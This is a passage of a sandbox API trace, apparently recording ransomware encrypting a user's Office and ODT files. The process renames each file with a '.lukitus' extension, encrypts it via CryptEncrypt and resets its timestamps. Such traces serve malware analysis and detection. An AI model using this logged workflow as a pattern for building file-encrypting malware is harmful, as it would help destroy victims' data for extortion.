[0106.737] SetFileTime (hFile=0x324, lpCreationTime=0x281fc94, lpLastAccessTime=0x281fc94, lpLastWriteTime=0x281fc94) returned 1 [0106.737] FlushFileBuffers (hFile=0x324) returned 1 [0106.742] GetFileAttributesExW (in: lpFileName="c:\\Users\\aETAdzjz\\Documents\\bwXEB4I4JkSNwm.pptx" (normalized: "c:\\users\\aetadzjz\\documents\\bwxeb4i4jksnwm.pptx"), fInfoLevelId=0x0, lpFileInformation=0x281f9e8 | out: lpFileInformation=0x281f9e8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3cf6ba60, ftCreationTime.dwHighDateTime=0x1d2fd71, ftLastAccessTime.dwLowDateTime=0xb16fb540, ftLastAccessTime.dwHighDateTime=0x1d302e9, ftLastWriteTime.dwLowDateTime=0xb16fb540, ftLastWriteTime.dwHighDateTime=0x1d302e9, nFileSizeHigh=0x0, nFileSizeLow=0x118e7)) returned 1 [0106.742] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.742] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.742] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.742] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.742] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.742] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.742] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.742] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.742] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.742] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.742] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.742] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.742] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.742] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.742] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.742] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.742] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.742] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.742] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.742] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.742] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x281fe74, cbMultiByte=4, lpWideCharStr=0x281f558, cchWideChar=4 | out: lpWideCharStr="41BB") returned 4 [0106.742] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x281fe70, cbMultiByte=4, lpWideCharStr=0x281f548, cchWideChar=4 | out: lpWideCharStr="9663") returned 4 [0106.742] CreateFileW (lpFileName="c:\\Users\\aETAdzjz\\Documents\\bwXEB4I4JkSNwm.pptx" (normalized: "c:\\users\\aetadzjz\\documents\\bwxeb4i4jksnwm.pptx"), dwDesiredAccess=0xc0000000, dwShareMode=0x4, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x324 [0106.742] MoveFileExW (lpExistingFileName="c:\\Users\\aETAdzjz\\Documents\\bwXEB4I4JkSNwm.pptx" (normalized: "c:\\users\\aetadzjz\\documents\\bwxeb4i4jksnwm.pptx"), lpNewFileName="c:\\Users\\aETAdzjz\\Documents\\F56924BE-9663-41BB-F1FCDEAA-FF7F06504774.lukitus" (normalized: "c:\\users\\aetadzjz\\documents\\f56924be-9663-41bb-f1fcdeaa-ff7f06504774.lukitus"), dwFlags=0x9) returned 1 [0106.744] CryptGenRandom (in: hProv=0x606b98, dwLen=0x10, pbBuffer=0x281f6dc | out: pbBuffer=0x281f6dc) returned 1 [0106.744] CryptEncrypt (in: hKey=0x5fc258, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x281f6dc*, pdwDataLen=0x281f58c*=0x10, dwBufLen=0x100 | out: pbData=0x281f6dc*, pdwDataLen=0x281f58c*=0x100) returned 1 [0106.750] ReadFile (in: hFile=0x324, lpBuffer=0x2da0020, nNumberOfBytesToRead=0x118e7, lpNumberOfBytesRead=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesRead=0x281f598*=0x118e7, lpOverlapped=0x0) returned 1 [0106.750] SetFilePointer (in: hFile=0x324, lDistanceToMove=0, lpDistanceToMoveHigh=0x281f584*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x281f584*=0) returned 0x0 [0106.750] WriteFile (in: hFile=0x324, lpBuffer=0x2da0020*, nNumberOfBytesToWrite=0x118e7, lpNumberOfBytesWritten=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesWritten=0x281f598*=0x118e7, lpOverlapped=0x0) returned 1 [0106.751] WriteFile (in: hFile=0x324, lpBuffer=0x281f6c8*, nNumberOfBytesToWrite=0x344, lpNumberOfBytesWritten=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x281f6c8*, lpNumberOfBytesWritten=0x281f598*=0x344, lpOverlapped=0x0) returned 1 [0106.751] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x281fc94 | out: lpSystemTimeAsFileTime=0x281fc94*(dwLowDateTime=0x63a79270, dwHighDateTime=0x1d31760)) [0106.751] SetFileTime (hFile=0x324, lpCreationTime=0x281fc94, lpLastAccessTime=0x281fc94, lpLastWriteTime=0x281fc94) returned 1 [0106.751] FlushFileBuffers (hFile=0x324) returned 1 [0106.754] GetFileAttributesExW (in: lpFileName="c:\\Users\\aETAdzjz\\Documents\\C5Ehab.pptx" (normalized: "c:\\users\\aetadzjz\\documents\\c5ehab.pptx"), fInfoLevelId=0x0, lpFileInformation=0x281f9e8 | out: lpFileInformation=0x281f9e8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7b37ccf0, ftCreationTime.dwHighDateTime=0x1d2d6a8, ftLastAccessTime.dwLowDateTime=0x46f3d8e0, ftLastAccessTime.dwHighDateTime=0x1d2de0e, ftLastWriteTime.dwLowDateTime=0x46f3d8e0, ftLastWriteTime.dwHighDateTime=0x1d2de0e, nFileSizeHigh=0x0, nFileSizeLow=0x1817b)) returned 1 [0106.754] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.754] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.754] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.754] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.754] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.754] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.754] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.754] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.754] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.754] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.754] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.754] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.754] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.754] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.754] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.754] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.754] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.754] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.754] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.754] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.754] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x281fe74, cbMultiByte=4, lpWideCharStr=0x281f558, cchWideChar=4 | out: lpWideCharStr="41BB") returned 4 [0106.754] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x281fe70, cbMultiByte=4, lpWideCharStr=0x281f548, cchWideChar=4 | out: lpWideCharStr="9663") returned 4 [0106.754] CreateFileW (lpFileName="c:\\Users\\aETAdzjz\\Documents\\C5Ehab.pptx" (normalized: "c:\\users\\aetadzjz\\documents\\c5ehab.pptx"), dwDesiredAccess=0xc0000000, dwShareMode=0x4, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x324 [0106.754] MoveFileExW (lpExistingFileName="c:\\Users\\aETAdzjz\\Documents\\C5Ehab.pptx" (normalized: "c:\\users\\aetadzjz\\documents\\c5ehab.pptx"), lpNewFileName="c:\\Users\\aETAdzjz\\Documents\\F56924BE-9663-41BB-1D9844F4-6DCE132FA911.lukitus" (normalized: "c:\\users\\aetadzjz\\documents\\f56924be-9663-41bb-1d9844f4-6dce132fa911.lukitus"), dwFlags=0x9) returned 1 [0106.756] CryptGenRandom (in: hProv=0x606b98, dwLen=0x10, pbBuffer=0x281f6dc | out: pbBuffer=0x281f6dc) returned 1 [0106.756] CryptEncrypt (in: hKey=0x5fc258, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x281f6dc*, pdwDataLen=0x281f58c*=0x10, dwBufLen=0x100 | out: pbData=0x281f6dc*, pdwDataLen=0x281f58c*=0x100) returned 1 [0106.762] ReadFile (in: hFile=0x324, lpBuffer=0x2da0020, nNumberOfBytesToRead=0x1817b, lpNumberOfBytesRead=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesRead=0x281f598*=0x1817b, lpOverlapped=0x0) returned 1 [0106.764] SetFilePointer (in: hFile=0x324, lDistanceToMove=0, lpDistanceToMoveHigh=0x281f584*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x281f584*=0) returned 0x0 [0106.764] WriteFile (in: hFile=0x324, lpBuffer=0x2da0020*, nNumberOfBytesToWrite=0x1817b, lpNumberOfBytesWritten=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesWritten=0x281f598*=0x1817b, lpOverlapped=0x0) returned 1 [0106.764] WriteFile (in: hFile=0x324, lpBuffer=0x281f6c8*, nNumberOfBytesToWrite=0x344, lpNumberOfBytesWritten=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x281f6c8*, lpNumberOfBytesWritten=0x281f598*=0x344, lpOverlapped=0x0) returned 1 [0106.764] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x281fc94 | out: lpSystemTimeAsFileTime=0x281fc94*(dwLowDateTime=0x63a9f3d0, dwHighDateTime=0x1d31760)) [0106.764] SetFileTime (hFile=0x324, lpCreationTime=0x281fc94, lpLastAccessTime=0x281fc94, lpLastWriteTime=0x281fc94) returned 1 [0106.764] FlushFileBuffers (hFile=0x324) returned 1 [0106.767] GetFileAttributesExW (in: lpFileName="c:\\Users\\aETAdzjz\\Documents\\fsb9bUgRCgwl4dnWSx.odt" (normalized: "c:\\users\\aetadzjz\\documents\\fsb9bugrcgwl4dnwsx.odt"), fInfoLevelId=0x0, lpFileInformation=0x281f9e8 | out: lpFileInformation=0x281f9e8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x567f1070, ftCreationTime.dwHighDateTime=0x1d30147, ftLastAccessTime.dwLowDateTime=0x18a8cd40, ftLastAccessTime.dwHighDateTime=0x1d2f6f2, ftLastWriteTime.dwLowDateTime=0x18a8cd40, ftLastWriteTime.dwHighDateTime=0x1d2f6f2, nFileSizeHigh=0x0, nFileSizeLow=0xdb50)) returned 1 [0106.767] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.767] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.768] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.768] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.768] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.768] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.768] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.768] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.768] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.768] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.768] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.768] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.768] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.768] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.768] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.768] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.768] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.768] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.768] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.768] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.768] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x281fe74, cbMultiByte=4, lpWideCharStr=0x281f558, cchWideChar=4 | out: lpWideCharStr="41BB") returned 4 [0106.768] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x281fe70, cbMultiByte=4, lpWideCharStr=0x281f548, cchWideChar=4 | out: lpWideCharStr="9663") returned 4 [0106.768] CreateFileW (lpFileName="c:\\Users\\aETAdzjz\\Documents\\fsb9bUgRCgwl4dnWSx.odt" (normalized: "c:\\users\\aetadzjz\\documents\\fsb9bugrcgwl4dnwsx.odt"), dwDesiredAccess=0xc0000000, dwShareMode=0x4, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x324 [0106.768] MoveFileExW (lpExistingFileName="c:\\Users\\aETAdzjz\\Documents\\fsb9bUgRCgwl4dnWSx.odt" (normalized: "c:\\users\\aetadzjz\\documents\\fsb9bugrcgwl4dnwsx.odt"), lpNewFileName="c:\\Users\\aETAdzjz\\Documents\\F56924BE-9663-41BB-988E0A99-75C5268FA982.lukitus" (normalized: "c:\\users\\aetadzjz\\documents\\f56924be-9663-41bb-988e0a99-75c5268fa982.lukitus"), dwFlags=0x9) returned 1 [0106.769] CryptGenRandom (in: hProv=0x606b98, dwLen=0x10, pbBuffer=0x281f6dc | out: pbBuffer=0x281f6dc) returned 1 [0106.769] CryptEncrypt (in: hKey=0x5fc258, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x281f6dc*, pdwDataLen=0x281f58c*=0x10, dwBufLen=0x100 | out: pbData=0x281f6dc*, pdwDataLen=0x281f58c*=0x100) returned 1 [0106.775] ReadFile (in: hFile=0x324, lpBuffer=0x2da0020, nNumberOfBytesToRead=0xdb50, lpNumberOfBytesRead=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesRead=0x281f598*=0xdb50, lpOverlapped=0x0) returned 1 [0106.776] SetFilePointer (in: hFile=0x324, lDistanceToMove=0, lpDistanceToMoveHigh=0x281f584*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x281f584*=0) returned 0x0 [0106.776] WriteFile (in: hFile=0x324, lpBuffer=0x2da0020*, nNumberOfBytesToWrite=0xdb50, lpNumberOfBytesWritten=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesWritten=0x281f598*=0xdb50, lpOverlapped=0x0) returned 1 [0106.776] WriteFile (in: hFile=0x324, lpBuffer=0x281f6c8*, nNumberOfBytesToWrite=0x344, lpNumberOfBytesWritten=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x281f6c8*, lpNumberOfBytesWritten=0x281f598*=0x344, lpOverlapped=0x0) returned 1 [0106.776] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x281fc94 | out: lpSystemTimeAsFileTime=0x281fc94*(dwLowDateTime=0x63a9f3d0, dwHighDateTime=0x1d31760)) [0106.776] SetFileTime (hFile=0x324, lpCreationTime=0x281fc94, lpLastAccessTime=0x281fc94, lpLastWriteTime=0x281fc94) returned 1 [0106.776] FlushFileBuffers (hFile=0x324) returned 1 [0106.779] GetFileAttributesExW (in: lpFileName="c:\\Users\\aETAdzjz\\Desktop\\MDETt7XI.ppt" (normalized: "c:\\users\\aetadzjz\\desktop\\mdett7xi.ppt"), fInfoLevelId=0x0, lpFileInformation=0x281f9e8 | out: lpFileInformation=0x281f9e8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf39729e0, ftCreationTime.dwHighDateTime=0x1d301a8, ftLastAccessTime.dwLowDateTime=0x4a46f510, ftLastAccessTime.dwHighDateTime=0x1d2f9a5, ftLastWriteTime.dwLowDateTime=0x4a46f510, ftLastWriteTime.dwHighDateTime=0x1d2f9a5, nFileSizeHigh=0x0, nFileSizeLow=0x1adc)) returned 1 [0106.779] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.779] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.779] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.779] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.779] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.779] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.779] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.779] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.779] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.779] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.779] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.779] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.779] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.779] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.779] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.779] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.779] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.780] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.780] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.780] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.780] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x281fe74, cbMultiByte=4, lpWideCharStr=0x281f558, cchWideChar=4 | out: lpWideCharStr="41BB") returned 4 [0106.780] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x281fe70, cbMultiByte=4, lpWideCharStr=0x281f548, cchWideChar=4 | out: lpWideCharStr="9663") returned 4 [0106.780] CreateFileW (lpFileName="c:\\Users\\aETAdzjz\\Desktop\\MDETt7XI.ppt" (normalized: "c:\\users\\aetadzjz\\desktop\\mdett7xi.ppt"), dwDesiredAccess=0xc0000000, dwShareMode=0x4, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x324 [0106.780] MoveFileExW (lpExistingFileName="c:\\Users\\aETAdzjz\\Desktop\\MDETt7XI.ppt" (normalized: "c:\\users\\aetadzjz\\desktop\\mdett7xi.ppt"), lpNewFileName="c:\\Users\\aETAdzjz\\Desktop\\F56924BE-9663-41BB-14D6A72B-E51A5D5DC391.lukitus" (normalized: "c:\\users\\aetadzjz\\desktop\\f56924be-9663-41bb-14d6a72b-e51a5d5dc391.lukitus"), dwFlags=0x9) returned 1 [0106.781] CryptGenRandom (in: hProv=0x606b98, dwLen=0x10, pbBuffer=0x281f6dc | out: pbBuffer=0x281f6dc) returned 1 [0106.781] CryptEncrypt (in: hKey=0x5fc258, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x281f6dc*, pdwDataLen=0x281f58c*=0x10, dwBufLen=0x100 | out: pbData=0x281f6dc*, pdwDataLen=0x281f58c*=0x100) returned 1 [0106.787] ReadFile (in: hFile=0x324, lpBuffer=0x2da0020, nNumberOfBytesToRead=0x1adc, lpNumberOfBytesRead=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesRead=0x281f598*=0x1adc, lpOverlapped=0x0) returned 1 [0106.788] SetFilePointer (in: hFile=0x324, lDistanceToMove=0, lpDistanceToMoveHigh=0x281f584*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x281f584*=0) returned 0x0 [0106.788] WriteFile (in: hFile=0x324, lpBuffer=0x2da0020*, nNumberOfBytesToWrite=0x1adc, lpNumberOfBytesWritten=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesWritten=0x281f598*=0x1adc, lpOverlapped=0x0) returned 1 [0106.788] WriteFile (in: hFile=0x324, lpBuffer=0x281f6c8*, nNumberOfBytesToWrite=0x344, lpNumberOfBytesWritten=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x281f6c8*, lpNumberOfBytesWritten=0x281f598*=0x344, lpOverlapped=0x0) returned 1 [0106.788] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x281fc94 | out: lpSystemTimeAsFileTime=0x281fc94*(dwLowDateTime=0x63ac5530, dwHighDateTime=0x1d31760)) [0106.788] SetFileTime (hFile=0x324, lpCreationTime=0x281fc94, lpLastAccessTime=0x281fc94, lpLastWriteTime=0x281fc94) returned 1 [0106.789] FlushFileBuffers (hFile=0x324) returned 1 [0106.792] GetFileAttributesExW (in: lpFileName="c:\\Users\\aETAdzjz\\Documents\\MB-yqTrORXhMOe.pptx" (normalized: "c:\\users\\aetadzjz\\documents\\mb-yqtrorxhmoe.pptx"), fInfoLevelId=0x0, lpFileInformation=0x281f9e8 | out: lpFileInformation=0x281f9e8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xeddd0ad0, ftCreationTime.dwHighDateTime=0x1d301d3, ftLastAccessTime.dwLowDateTime=0x2c1b98f0, ftLastAccessTime.dwHighDateTime=0x1d2ed6d, ftLastWriteTime.dwLowDateTime=0x2c1b98f0, ftLastWriteTime.dwHighDateTime=0x1d2ed6d, nFileSizeHigh=0x0, nFileSizeLow=0x10c1d)) returned 1 [0106.792] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.792] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.792] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.792] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.792] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.792] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.792] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.792] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.792] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.792] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.792] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.792] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.792] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.792] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 